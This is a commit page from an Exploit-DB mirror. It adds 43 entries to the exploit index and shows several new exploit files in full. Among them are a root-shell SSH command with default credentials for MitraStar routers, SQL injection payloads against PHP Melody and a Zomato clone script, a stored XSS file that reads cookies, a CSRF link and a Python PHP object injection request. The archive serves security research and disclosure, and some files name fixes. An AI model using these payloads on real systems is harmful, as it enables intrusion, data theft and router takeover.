bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-10-31

Browse source 
43 new exploits

Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service
Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service

SGI IRIX 6.3 Systour and OutOfBox - Exploit
SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit

Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel  Reference Count Leak / Use-After-Free
Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free

Novell eDirectory 9.0 - DHost Remote Buffer Overflow
Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow

Cisco IOS 12.3(18) (FTP Server)  - Remote Exploit (Attached to GDB)
Cisco IOS 12.3(18) (FTP Server) - Remote Exploit (Attached to GDB)

Opera 9.61 - opera:historysearch Code Execution (PoC)
Opera 9.61 - 'opera:historysearch' Code Execution (PoC)

Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal
Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal

Microsoft Windows 95/WfW - smbclient Directory Traversal
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal

RSA Authentication Agent for Web 5.3 -  Open Redirection
RSA Authentication Agent for Web 5.3 - Open Redirection

Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp'  Open Redirection
Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' Open Redirection

HP System Management Homepage - 'RedirectUrl'  Open Redirection
HP System Management Homepage - 'RedirectUrl' Open Redirection

FirePass 7.0 SSL VPN - 'refreshURL'  Open Redirection
FirePass 7.0 SSL VPN - 'refreshURL' Open Redirection

EasyFTP Server 1.7.0.11 - 'APPE'  Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow

MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation

MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection
MyPHP Forum 3.0 - Edit Topics / Blind SQL Injection

ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information  Disclosure Vulnerabilities
ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Information Disclosure Vulnerabilities

Tkai's Shoutbox - 'Query'  Open Redirection
Tkai's Shoutbox - 'Query' Open Redirection

SAP Web Application Server 6.x/7.0 -  Open Redirection
SAP Web Application Server 6.x/7.0 - Open Redirection

UC Gateway Investment SiteEngine 5.0 - 'api.php'  Open Redirection
UC Gateway Investment SiteEngine 5.0 - 'api.php' Open Redirection

Autonomy Ultraseek - 'cs.html'  Open Redirection
Autonomy Ultraseek - 'cs.html' Open Redirection

Joomla! Component com_user - 'view'  Open Redirection
Joomla! Component com_user - 'view' Open Redirection

MBoard 1.3 - 'url'  Open Redirection
MBoard 1.3 - 'url' Open Redirection

Sitecore CMS 6.4.1 - 'url'  Open Redirection
Sitecore CMS 6.4.1 - 'url' Open Redirection

Orchard 1.3.9 - 'ReturnUrl'  Open Redirection
Orchard 1.3.9 - 'ReturnUrl' Open Redirection

Tiki Wiki CMS Groupware - 'url'  Open Redirection
Tiki Wiki CMS Groupware - 'url' Open Redirection

WebsitePanel - 'ReturnUrl'  Open Redirection
WebsitePanel - 'ReturnUrl' Open Redirection

ocPortal 7.1.5 - 'redirect'  Open Redirection
ocPortal 7.1.5 - 'redirect' Open Redirection

Silverstripe CMS 2.4.x - 'BackURL'  Open Redirection
Silverstripe CMS 2.4.x - 'BackURL' Open Redirection
PHP Melody 2.6.1 - SQL Injection
PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)
phpMyFAQ 2.9.8 - Cross-Site Request Forgery
WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection
Zomato Clone Script - 'resid' SQL Injection
Website Broker Script - 'status_id' SQL Injection
Vastal I-Tech Agent Zone - SQL Injection
Php Inventory - Arbitrary File Upload
Online Exam Test Application - 'sort' SQL Injection
Nice PHP FAQ Script - 'nice_theme' SQL Injection
Fake Magazine Cover Script - SQL Injection
CPA Lead Reward Script - SQL Injection
Basic B2B Script - SQL Injection
CmsLite 1.4 - 'S' SQL Injection
MyMagazine 1.0 - 'id' SQL Injection
News 1.0 - SQL Injection
Newspaper 1.0 - SQL Injection
US Zip Codes Database - 'state' SQL Injection
Shareet - 'photo' SQL Injection
AROX School ERP PHP Script - 'id' SQL Injection
Protected Links - SQL Injection
ZeeBuddy 2x - 'groupid' SQL Injection
Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection
tPanel 2009 - Authentication Bypass
Sokial Social Network Script 1.0 - SQL Injection
SoftDatepro Dating Social Network 1.3 - SQL Injection
Same Sex Dating Software Pro 1.0 - SQL Injection
PHP CityPortal 2.0 - SQL Injection
PG All Share Video 1.0 - SQL Injection
MyBuilder Clone 1.0 - 'subcategory' SQL Injection
Mailing List Manager Pro 3.0 - SQL Injection
Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection
Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection
Job Board Script - 'nice_theme' SQL Injection
iTech Gigs Script 1.21 - SQL Injection
iStock Management System 1.0 - Arbitrary File Upload
iProject Management System 1.0 - 'ID' SQL Injection
Article Directory Script 3.0 - 'id' SQL Injection
Adult Script Pro 2.2.4 - SQL Injection
D-Park Pro 1.0 - SQL Injection
Ingenious 2.3.0 - Arbitrary File Upload
Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure
This commit is contained in:
Offensive Security 2017-10-31 05:01:39 +00:00
parent 9352001fe6
commit 33cc894818
45 changed files with 1815 additions and 28 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

55
files.csv
View file

@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port
28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - 'RemoveChild' Denial of Service",2006-10-30,"Wojciech H",windows,dos,0
28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service",2006-11-01,"Matousec Transparent security",windows,dos,0
28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service",2006-11-02,LMH,linux,dos,0
28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7 - MHTML Denial of Service",2006-11-02,"Positive Technologies",windows,dos,0
@ -7448,7 +7448,7 @@ id,file,description,date,author,platform,type,port
19353,platforms/irix/local/19353.txt,"SGI IRIX 6.4 suid_exec - Exploit",1996-12-02,"Yuri Volobuev",irix,local,0
19354,platforms/aix/local/19354.txt,"SGI IRIX 5.1/5.2 sgihelp - Exploit",1996-12-02,anonymous,aix,local,0
19355,platforms/irix/local/19355.txt,"SGI IRIX 6.4 startmidi - Exploit",1997-02-09,"David Hedley",irix,local,0
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 Systour and OutOfBox - Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
19356,platforms/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Exploit",1996-10-30,"Tun-Hui Hu",irix,local,0
19358,platforms/irix/local/19358.txt,"SGI IRIX 6.4 xfsdump - Exploit",1997-05-07,"Yuri Volobuev",irix,local,0
19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0
@ -9841,7 +9841,7 @@ id,file,description,date,author,platform,type,port
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
2729,platforms/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",windows,remote,2049
@ -10365,7 +10365,7 @@ id,file,description,date,author,platform,type,port
6873,platforms/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0
6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote,0
6878,platforms/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote,0
6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
6880,platforms/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote,0
6899,platforms/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote,0
6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API Exploit (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote,0
6963,platforms/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote,0
@ -10942,7 +10942,7 @@ id,file,description,date,author,platform,type,port
15347,platforms/windows/remote/15347.py,"XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Buffer Overflow",2010-10-28,n00b,windows,remote,0
15349,platforms/windows/remote/15349.txt,"Home FTP Server 1.11.1.149 - Authenticated Directory Traversal",2010-10-29,chr1x,windows,remote,0
15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit",2010-10-29,Unknown,windows,remote,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 RETR DELE RMD - Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
15357,platforms/windows/remote/15357.php,"Home FTP Server 1.11.1.149 - 'RETR'/'DELE'/'RMD' Directory Traversal",2010-10-30,"Yakir Wizman",windows,remote,0
15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
15371,platforms/windows/remote/15371.txt,"Yaws 1.89 - Directory Traversal",2010-11-01,nitr0us,windows,remote,0
@ -12305,7 +12305,7 @@ id,file,description,date,author,platform,type,port
20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential (Metasploit)",2012-08-08,Metasploit,windows,remote,0
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution",2000-10-29,"Mark Stratman",cgi,remote,0
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW - smbclient Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal",1995-10-30,"Dan Shearer",windows,remote,0
20372,platforms/hardware/remote/20372.pl,"Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 - Remote Username / Password Retrieval",2000-10-26,@stake,hardware,remote,0
20374,platforms/unix/remote/20374.c,"ISC BIND 8.1 - Host Remote Buffer Overflow",2000-10-27,antirez,unix,remote,0
20375,platforms/windows/remote/20375.txt,"Sun Java Web Server 1.1 Beta - Viewable .jhtml Source",1997-07-16,"Brian Krahmer",windows,remote,0
@ -15930,6 +15930,7 @@ id,file,description,date,author,platform,type,port
43032,platforms/unix/remote/43032.rb,"Polycom - Command Shell Authorization Bypass (Metasploit)",2017-10-23,Metasploit,unix,remote,0
43055,platforms/hardware/remote/43055.rb,"Netgear DGN1000 1.1.00.48 - 'Setup.cgi' Unauthenticated Remote Code Execution (Metasploit)",2017-10-25,Metasploit,hardware,remote,0
43059,platforms/windows/remote/43059.py,"DameWare Remote Controller < 12.0.0.520 - Remote Code Execution",2016-04-03,Securifera,windows,remote,0
43061,platforms/hardware/remote/43061.txt,"MitraStar DSL-100HN-T1/GPT-2541GNAC - Privilege Escalation",2017-10-28,j0lama,hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38754,3 +38755,45 @@ id,file,description,date,author,platform,type,port
43052,platforms/php/webapps/43052.txt,"FS Realtor Clone - 'id' SQL Injection",2017-10-24,8bitsec,php,webapps,0
43053,platforms/nodejs/webapps/43053.txt,"KeystoneJS 4.0.0-beta.5 - CSV Excel Macro Injection",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
43054,platforms/nodejs/webapps/43054.txt,"KeystoneJS 4.0.0-beta.5 - Cross-Site Scripting",2017-10-25,"Ishaq Mohammed",nodejs,webapps,0
43062,platforms/php/webapps/43062.txt,"PHP Melody 2.6.1 - SQL Injection",2017-10-28,"Venkat Rajgor",php,webapps,0
43063,platforms/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",php,webapps,0
43064,platforms/php/webapps/43064.txt,"phpMyFAQ 2.9.8 - Cross-Site Request Forgery",2017-10-27,"Nikhil Mittal",php,webapps,0
43065,platforms/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,php,webapps,0
43066,platforms/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43067,platforms/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43068,platforms/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43069,platforms/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
43070,platforms/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43071,platforms/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43072,platforms/php/webapps/43072.txt,"Fake Magazine Cover Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43073,platforms/php/webapps/43073.txt,"CPA Lead Reward Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43074,platforms/php/webapps/43074.txt,"Basic B2B Script - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43075,platforms/php/webapps/43075.txt,"CmsLite 1.4 - 'S' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43076,platforms/php/webapps/43076.txt,"MyMagazine 1.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43077,platforms/php/webapps/43077.txt,"News 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43078,platforms/php/webapps/43078.txt,"Newspaper 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43079,platforms/php/webapps/43079.txt,"US Zip Codes Database - 'state' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43080,platforms/php/webapps/43080.txt,"Shareet - 'photo' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43081,platforms/php/webapps/43081.txt,"AROX School ERP PHP Script - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43082,platforms/php/webapps/43082.txt,"Protected Links - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43083,platforms/php/webapps/43083.txt,"ZeeBuddy 2x - 'groupid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43084,platforms/php/webapps/43084.txt,"Vastal I-Tech Dating Zone 0.9.9 - 'product_id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43085,platforms/php/webapps/43085.txt,"tPanel 2009 - Authentication Bypass",2017-10-30,"Ihsan Sencan",php,webapps,0
43086,platforms/php/webapps/43086.txt,"Sokial Social Network Script 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43087,platforms/php/webapps/43087.txt,"SoftDatepro Dating Social Network 1.3 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43088,platforms/php/webapps/43088.txt,"Same Sex Dating Software Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43089,platforms/php/webapps/43089.txt,"PHP CityPortal 2.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43090,platforms/php/webapps/43090.txt,"PG All Share Video 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43091,platforms/php/webapps/43091.txt,"MyBuilder Clone 1.0 - 'subcategory' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43092,platforms/php/webapps/43092.txt,"Mailing List Manager Pro 3.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43093,platforms/php/webapps/43093.txt,"Joomla! Component Zh YandexMap 6.1.1.0 - 'placemarklistid' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43094,platforms/php/webapps/43094.txt,"Joomla! Component NS Download Shop 2.2.6 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43095,platforms/php/webapps/43095.txt,"Job Board Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43096,platforms/php/webapps/43096.txt,"iTech Gigs Script 1.21 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43097,platforms/php/webapps/43097.txt,"iStock Management System 1.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
43098,platforms/php/webapps/43098.txt,"iProject Management System 1.0 - 'ID' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43099,platforms/php/webapps/43099.txt,"Article Directory Script 3.0 - 'id' SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43100,platforms/php/webapps/43100.txt,"Adult Script Pro 2.2.4 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43101,platforms/php/webapps/43101.txt,"D-Park Pro 1.0 - SQL Injection",2017-10-30,"Ihsan Sencan",php,webapps,0
43102,platforms/php/webapps/43102.txt,"Ingenious 2.3.0 - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",php,webapps,0
43103,platforms/xml/webapps/43103.py,"Oracle Java SE - Web Start jnlp XML External Entity Processing Information Disclosure",2017-10-30,mr_me,xml,webapps,0

Can't render this file because it is too large.

27
platforms/hardware/remote/43061.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Privilege escalation MitraStar routers
# Date: 28-10-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mitrastar.com/
# Provider Homepage: https://www.movistar.com/
# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php
Description
-----------
SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.
$ ssh 1234@ip /bin/sh
This give us a shell with root permissions.
Note: the password for 1234 user is under the router.
You can copy all file system to your local machine using scp.
In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).
Solution
--------
In the latest firmware versions this have been fixed.
If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.

18
platforms/php/webapps/43062.txt Executable file
View file

@ -0,0 +1,18 @@
###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################
Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

41
platforms/php/webapps/43063.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability
# Date: 28-9-2017
# Exploit Author: Nikhil Mittal (Payatu Labs)
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Version: 2.9.8
# Tested on: MAC OS
# CVE : 2017-15727
1. Description
In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.
2. Proof of concept
Exploit code
<!DOCTYPE html>
<html>
<head>
<title>XSS EXPLOIT</title>
</head>
<body>
<script>confirm(document.cookie)</script>
</body>
</html>
Steps to reproduce:
1. Create a user having limited access rights to attachment section
2. Goto http://localhost/phpmyfaq/admin/?action=editentry
2. Upload the exploit code with .html extension at the place of attachements
3. Access the file url generated at /phpmyfaq/attachments/<random_path>
4. Reach to last file using directory traversal and XSS will triage
3. Solution
Update to phpMyFAQ Version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip

29
platforms/php/webapps/43064.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: phpMyFAQ 2.9.8 CSRF Vulnerability
# Date: 27-9-2017
# Exploit Author: Nikhil Mittal (Payatu Labs)
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Version: 2.9.8
# Tested on: MAC OS
# CVE : 2017-15730
1. Description
In phpMyFAQ before 2.9.8, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
2. Proof of concept
<html>
<head>
<title>PHPMYSQL CSRF EXPLOIT</title>
</head>
<body>
<a href="http://127.0.0.1/phpmyfaq/admin/?action=clear-statistics">EXPLOIT!</a>
</body>
</html>
3. Solution
Update to phpMyFAQ Version 2.9.9
http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip

66
platforms/php/webapps/43065.py Executable file
View file

@ -0,0 +1,66 @@
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Okt 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24]
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]
tested on app version 4.2.23, 4.2.24
we can send an evil cookie (login not required) to vulnerable function
1. vulnerable code on Functions/Process_Ajax.php <= tested
203 // Adds an item to the plugin's cart
204 function UPCP_Add_To_Cart() {
205 global $woocommerce;
206 global $wpdb;
207 global $items_table_name;
208
209 $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");
210
211 if ($WooCommerce_Checkout == "Yes") {
212 $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
213 echo "WC ID: " . $WC_Prod_ID . "<Br>";
214 $woocommerce->cart->add_to_cart($WC_Prod_ID);
215 }
216
217 if (isset($_COOKIE['upcp_cart_products'])) {
218 $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
219 }
220 else {
221 $Products_Array = array();
222 }
223
224 $Products_Array[] = $_POST['prod_ID'];
225 $Products_Array = array_unique($Products_Array);
226 setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
227 }
228 add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
229 add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
2. vulnerable code on Functions/Shortcodes.php <= not tested
POC
1. use a WP plugin to test php object injection,
like this one https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
2. make a request
#-----------------------------------
#! /usr/bin/python
import requests
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?";
data = {'action':'upcp_add_to_cart'}
headers = {
'Content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)
print r.content
#------------------------------------

40
platforms/php/webapps/43066.txt Executable file
View file

@ -0,0 +1,40 @@
# # # # #
# Exploit Title: Zomato Clone Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
# Demo: http://jhinstitute.com/demo/foodpanda/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15993
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/restaurant-menu.php?resid=[SQL]
#
# -539'+++/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x3132,0x3133,0x3134--+-
#
# Parameter: resid (GET)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
# Payload: resid=-9239 OR 3532=3532#
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: resid=539 AND SLEEP(5)
#
# Type: UNION query
# Title: MySQL UNION query (87) - 10 columns
# Payload: resid=539 UNION ALL SELECT 87,87,87,87,87,CONCAT(0x7170767071,0x7368446c664e5950484e757a6b4b5a616972446f41484d74485874656e476369647a774865767369,0x7176766b71),87,87,87,87#
#
# Etc..
# # # # #

36
platforms/php/webapps/43067.txt Executable file
View file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: Website Broker Script - 'status_id' Parameter SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/product/UwCG4464436/php-scripts/website-broker-script
# Demo: http://www.officialwebsiteforsale.com/official/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15992
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
